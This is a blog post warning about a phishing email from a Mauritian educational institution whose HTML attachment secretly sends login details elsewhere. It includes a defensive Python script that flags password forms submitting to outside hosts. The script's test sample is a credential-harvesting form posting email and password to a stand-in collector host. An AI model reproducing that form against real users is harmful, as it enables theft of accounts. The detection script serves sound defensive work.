Beware: Phishing mail alert from a Mauritian educational institution!

When she received a university mail asking her to log in with her email address and password to gain access to some files, my cousin immediately found something suspicious. To be sure not to miss any important mail from that Mauritian educational institution providing tertiary courses, she forwarded the mail along with the attached login file to my mailbox.

A perfect mail

Phishing mail from Mauritian Educational Institution

As you can see above, everything is just perfect: official mail, footer, names, telephone numbers and address. Then, I opened the attached file named ‘docfile.html’ and here’s what it looks like:

Phishing login page

What’s wrong?

Her suspicions turned out to be right. I remember seeing something similar on Ish’s blog some time back!

Up to now, you probably have not noticed anything alarming except that it asks for your email address and password. And most unaware people will probably just enter these details and click submit. Unfortunately, if you ever came across such a page and you did click on that button, I advise you to immediately change your password, if it isn’t too late already! When you click that damn button, the page secretly sends your email address and password to a site (either the hacker’s own site or one on which he / she placed a mechanism to collect those email details). How?

The extract below shows part of the source code found in the file. The region I highlighted is the link to where the email details are being sent and stored without your knowledge:

Phishing - code behind
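One way to find that link without opening the attachment in a browser is to parse the file and list where each password form submits. This is an added example, not code from the original mail or post; the sample markup and the host `collector.example` are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormAudit(HTMLParser):
    """Record each <form>, its action URL and whether it holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []       # one dict per <form> seen
        self.in_form = False  # True between <form> and </form>

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.in_form = True
            self.forms.append({"action": (a.get("action") or "").strip(),
                               "method": (a.get("method") or "get").lower(),
                               "password": False})
        elif tag == "input" and self.in_form:
            if (a.get("type") or "").lower() == "password":
                self.forms[-1]["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self.in_form = False


def credential_destinations(html_text):
    """Return (method, host, action) for every form that collects a password
    and submits it to an absolute http(s) URL, i.e. away from the local file."""
    parser = FormAudit()
    parser.feed(html_text)
    found = []
    for form in parser.forms:
        url = urlparse(form["action"])
        if form["password"] and url.scheme in ("http", "https") and url.hostname:
            found.append((form["method"], url.hostname, form["action"]))
    return found


# Constructed sample standing in for an attachment such as docfile.html
SAMPLE = """<html><body>
<form method="POST" action="http://collector.example/save.php">
  <input type="text" name="email"><input type="password" name="pass">
  <input type="submit" value="Submit">
</form></body></html>"""

if __name__ == "__main__":
    for method, host, action in credential_destinations(SAMPLE):
        print(f"password form submits via {method.upper()} to {host}: {action}")
```

This only covers a static `action` attribute; a page that sends the fields from JavaScript needs its script read as well.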

How did this happen?

As shown above, everything in the mail looks genuine. So, how did that person send you that phishing mail? Well, there are many possibilities, but to keep it simple, the mail was most probably forwarded automatically to everyone in a specific address book, computer or server which was hacked or infected with malicious software.

In fact, that’s very similar to the pornographic content which keeps being shared by your Facebook friend without his / her knowledge:

Phishing on Facebook

This mostly happens when someone downloads and installs pirated software or files from non-trusted sources. Once this malicious software is automatically installed, it secretly starts infecting others in the background by sending these phishing mails or sharing similar content on social networks.

If you want to avoid having such problems, you should stop clicking on every untrusted link or software you come across on the web. Also, don’t always believe what you see on the internet. For instance, who’s the fool who’s going to give away hundreds of iPhones or other free stuff to those who share their pages?

So, please use the internet wisely and carefully.

Take care,

Yashvin
